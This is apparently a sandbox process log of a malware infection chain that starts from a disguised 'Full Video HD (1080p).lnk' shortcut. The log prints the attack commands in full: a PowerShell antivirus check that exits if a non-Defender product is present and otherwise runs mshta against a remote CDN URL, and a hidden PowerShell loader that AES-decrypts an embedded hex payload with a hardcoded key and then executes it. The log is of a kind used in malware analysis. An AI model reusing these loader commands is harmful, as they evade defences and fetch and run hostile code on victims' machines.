cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "RoZi" "C:\Users\test22\AppData\Local\Temp\Full Video HD (1080p).lnk"
2576powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $z = Get-WmiObject -Namespace 'root\SecurityCenter2' -Class AntiVirusProduct -ComputerName $env:computername;foreach($Q in $z ){if ($Q.displayName -replace 'Windows Defender', ''){Exit}}.'mshta'https://mato3f.b-cdn.net/town-fil
2664powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function AhBIbM($IgrLbfp){return -split ($IgrLbfp -replace '..', '0x$& ')};$BPcMZpv = AhBIbM('DD763E43A90415240CFBAC0632CE266D452C2A7841493E3D0A9695A7AA20E1DD8032249E2CC982DC84B8579A5F7DD313C5170C7517051A607DFA780BF13FD90BE64D20CC57E783CD03E5A5E3E5189FB370C8B686B57940AF59E986EC5608BB608F2466B1084AB242B5F24E0896D96B98B3A8DA3F29A7C647585A21FB52D51B9CCE92C9AC8F68DD9694445180966043BBAA3580EA54F0F8F5E264805261E02B37E83528AB995CE0C0CF5670521536517E256D90866AACC105E656A759D9BFC8EC8615A42EC90FC0197C355FC8117BD3F123152FE30F7CF878187AAC69F61A320C81C83001BB113AD4685CBAB31C24601BE9A19DBA4762373D2C3ED839F74682E945A6E9FE141BE3BAA78E5ABCEC50CD31A3FC8720166F01D89D7C8B1F6D4A8E3CB2106B1885459960FE3569CD8666DD503769005F4DD4AD3C4A37AEFA0B44180F79A0656C11A3F7B413B8D7B3C3B23EE72E13AA3ADB653043DEC181F9D559BFFFA7A7DDBECEF5C9571B062AA098139684DB95821827063404069896C3E8D678E5496EADC16DA1CBD465FE44EBC3A0335252AB2F9620F854BF7C523B78127E78D57CA5A13AA9C4A1FFDBC2BEAF4CE38B56C198C3D2B6292F24E2334316A4A6BC207711AF986B1F3CE495C2272C12F2F5699B825F668169F5B91F9E363732250FF4380C9D386E4A106DD959EA83916BBC06F0FFC2C23E8559BB377E8D7B18E132FC681838568811D7ACCA4F6D6AB56D99751B59764157EFB0D3651A6C91F7BDCF3A5695B2CD1D50D10734AB2AC50864D8ECA5BFFA4BF1649F84100682B809277E685F3B8376BBBD3F1029F0D90A4930C9AFF42713668485E01E2BE2278F4ED2C495F8B148B53246D220B5D316DD6BA3B99AA71989F71FC1D8ABF44C18FDF3305D84206D6E0DAA2DB56C95E773040924F742D0F91B1C6B2D4C908F4010B693A1E11C9C143B08311721EDA2915E5174F4416CBBD55C7BE34F4672E60B87CB53BF8AAC8418893647D51DBE5EB7499678060742D6282991A520E63F5AC45A42DE6483C45F7E7C7FC777D43923F926A80884DCDD879B75EC22714564AC5A15B2D82FF8D453C6152EBF4C34FBBEF181BA4FF5D5903162B6DDA2016981B467BEA93BF804090D31778E8C64B7847645770141FE8CE0E0FCEC6734B1381ADAB7FA35770EEB74B63C0E708CB8B70878E3D123E3A531A66444460C872FA999B948968F0847C91EFA1AFF6B27AB49CC77B96C9F9EA99793F3BBD9CFFB5749D6A33A2B98CB194271E358B1ED93B4D1AFDD2341C73F02951B278848290C32A899143853C6F56242FB57BA7C0DD1BF770E9D3401E181F1E7231D92390D2E846FAF8F5E5F175CCDDF1DEA61953787337D15E551A238A7D3AFBB3F076C45765A73AEF7691F6ED8A668119105A296CD84CA77BF235678F8EFB5F9683772F57C88B6201196DD376640CCF00E3E7AE93D8591967BC118FA1F6EDC2CD8BACD1CBD195CBED09D4D90CE14134CF532E41DA84B77BC67D0B49062B530FE62795C0C4B155DE39986C91B4F5950D2826FEC7640412F5E20418860251CE8C2E9D96A761BE4067B02B578C6EE686D09194EDB5AE484270A6928708554762CB55FBB4FDBEBA0705AF13BE7407E01021FFDC09C69AF842F826850CFD3657997D8434E7A2BA4208E5FD685124AC1ED560B5DE0363ACB3C99251A85856F0C3FA36EBCA6632FFB62290FD487F8A160B6EBC330ACEEC4FF58DEC7030A7B36035CB8AC2CB8E418DFD6AECED950BE0C1280D84B0814F7DAFD9B9921B0B16DC1534935C220A2ACC2C43AF77F9EA6540600C50A4A730AF4BEE7B6C1BA06DB303C8CA383DA2F5ADB10D74DBE226667D38F901B8AF8');$EuKaN = [System.Security.Cryptography.Aes]::Create();$EuKaN.Key = AhBIbM('617764734D4C625449457472684C5579');$EuKaN.IV = New-Object byte[] 16;$dDDXPafQ = $EuKaN.CreateDecryptor();$zVxGrKjwz = $dDDXPafQ.TransformFinalBlock($BPcMZpv, 0, $BPcMZpv.Length);$uadABVLob = [System.Text.Encoding]::Utf8.GetString($zVxGrKjwz);$dDDXPafQ.Dispose();& $uadABVLob.Substring(0,3) $uadABVLob.Substring(3)
2996